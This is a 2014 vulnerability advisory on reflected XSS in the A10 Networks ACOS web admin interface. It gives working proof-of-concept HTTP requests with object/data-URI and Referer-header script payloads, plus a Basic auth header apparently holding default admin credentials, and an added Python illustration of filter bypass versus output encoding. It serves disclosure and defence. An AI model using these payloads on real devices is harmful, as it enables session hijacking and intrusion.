
A10 Networks Reflected XSS vulnerability

20-06-2014

Quantum Leap Advisory: A10 Networks Reflected XSS in ACOS[1] 2.7.0-P2 – Advisory #QLA140505
Affected Product: ACOS 2.7.0-P2 (build: 53) (older versions may be affected too) (Tested on SoftAX[2])
Credits: Vulnerability discovered by Francesco Perna of Quantum Leap s.r.l

Executive Summary

Using a specially crafted HTTP request, it is possible to exploit a lack of neutralization[3] in the output of pages that include user-submitted content. Successful exploitation results in the execution of arbitrary HTML and script code in the user's browser, in the context of the vulnerable web application, through a "Reflected XSS".

Proof of Concept

The following paragraphs show the two kinds of XSS we found on the web administrative interface.

404 error page leads to XSS

Submitting arbitrary input in an HTTP request for a non-existent resource causes the server to generate a 404 error page. The generated error page includes the user input without neutralizing it, which leads to reflected XSS. Since neither the "<script>" tag nor whitespace is allowed in this input, the vulnerability can be demonstrated with the "<object>" tag, whose data: URI carries the sample payload "<script>alert(1)</script>" encoded in base64.

GET ///<object/**/data="data:text/html;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg=="></object> HTTP/1.1
Host: 192.168.1.210
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:20.0) Gecko/20100101 Firefox/20.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: it-IT,it;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Connection: keep-alive

Figure 1 shows the arbitrary code executed in the user browser context.

Figure 1 – A10 Networks Reflected XSS vulnerability – Object via GET

Another entry point is the Referer header. In this case the <script> tag is allowed and the PoC is straightforward.

GET /fake HTTP/1.1
Host: 192.168.1.210
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:20.0) Gecko/20100101 Firefox/20.0
Referer: "/><script>alert(2)</script><Fake"
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: it-IT,it;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Connection: keep-alive

Figure 2 shows the arbitrary code executed in the user browser context.

Figure 2 – A10 Networks Reflected XSS vulnerability – Script via Referer

Custom error page leads to XSS

Submitting arbitrary input in an HTTP request, after being authenticated, causes the application to generate a custom error page. The generated error page includes the user input without neutralizing it, which leads to reflected XSS.

GET /US/08a53c111eb0df06a6b3661db44937/sys_start.frm?=""<object/**/data="data:text/html;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg==">=1 HTTP/1.1
Host: 192.168.1.210
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:20.0) Gecko/20100101 Firefox/20.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: it-IT,it;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Connection: keep-alive
Authorization: Basic YWRtaW46YTEw

Figure 3 shows the arbitrary code executed in the user browser context.

Figure 3 – A10 Networks Reflected XSS vulnerability – Object via GET
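As an added illustration, not code from the advisory or from A10 Networks, the Python below models the behaviour the three PoCs above rely on: a hypothetical 404 handler that rejects the literal "<script>" tag and whitespace but otherwise reflects the request path and Referer, contrasted with the same page after the OWASP-style output encoding the advisory references in [3]. The filter, the page template and the helper names are assumptions; the payloads are the ones from the PoC requests.

```python
import base64
import html
import re
from typing import Optional

# Payloads copied from the advisory's PoC requests (constructed test input for this example).
OBJECT_PAYLOAD = ('<object/**/data="data:text/html;base64,'
                  'PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg=="></object>')
REFERER_PAYLOAD = '"/><script>alert(2)</script><Fake"'


def decode_data_uri(payload: str) -> Optional[str]:
    """Reveal what a base64 data: URI actually carries (here: the encoded script tag)."""
    m = re.search(r'base64,([A-Za-z0-9+/=]+)', payload)
    return base64.b64decode(m.group(1)).decode() if m else None


def blocklist_filter(value: str) -> Optional[str]:
    """Hypothetical input filter modelled on the behaviour the advisory describes:
    the literal <script> tag and whitespace are rejected, anything else passes."""
    if '<script' in value.lower() or re.search(r'\s', value):
        return None  # request rejected
    return value     # reflected as-is: the <object/**/data=...> payload gets through


def error_page_vulnerable(path: str, referer: str) -> str:
    """404 page that reflects the request path and Referer without neutralization."""
    return (f'<html><body><h1>404</h1><p>Not found: {path}</p>'
            f'<a href="{referer}">back</a></body></html>')


def error_page_fixed(path: str, referer: str) -> str:
    """Same page with output encoding per the OWASP cheat sheet [3]: HTML entity
    encoding for element content and for the quoted attribute value."""
    return (f'<html><body><h1>404</h1><p>Not found: {html.escape(path)}</p>'
            f'<a href="{html.escape(referer, quote=True)}">back</a></body></html>')


def contains_active_markup(page: str) -> bool:
    """Check used by this example only: did an <object> or <script> element survive
    into the rendered page? Entity-encoded '&lt;object' does not match."""
    return re.search(r'<(object|script)[\s/>]', page, re.IGNORECASE) is not None
```

The blocklist passes the object payload untouched because the script tag only exists inside the base64 text, whereas entity encoding at the output point neutralizes both payloads regardless of how they were encoded on the way in.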

Solution

To fix the A10 Networks Reflected XSS vulnerability, upgrade to version 2.7.0-p3 or later.

Disclosure Timeline

2013-05-11 – A10 Networks Reflected XSS vulnerability discovered
2013-05-28 – Initial vendor notification
2013-05-30 – The vendor acknowledged the vulnerability (bug 128069)
2013-05-30 – First attempt to coordinate the vulnerability disclosure, no response
2013-06-19 – The vendor fixed the vulnerability
2013-07-10 – Second attempt to coordinate the vulnerability disclosure, no response
2014-03-30 – Last vendor notification
2014-04-02 – The vendor did not respond
2014-04-02 – Public advisory

References

[1] http://www.a10networks.com/about/technology_platform_acos.php
[2] http://www.a10networks.com/glossary/SoftAX.php
[3] https://www.owasp.org/index.php/XSS_(Cross_Site_Scripting)_Prevention_Cheat_Sheet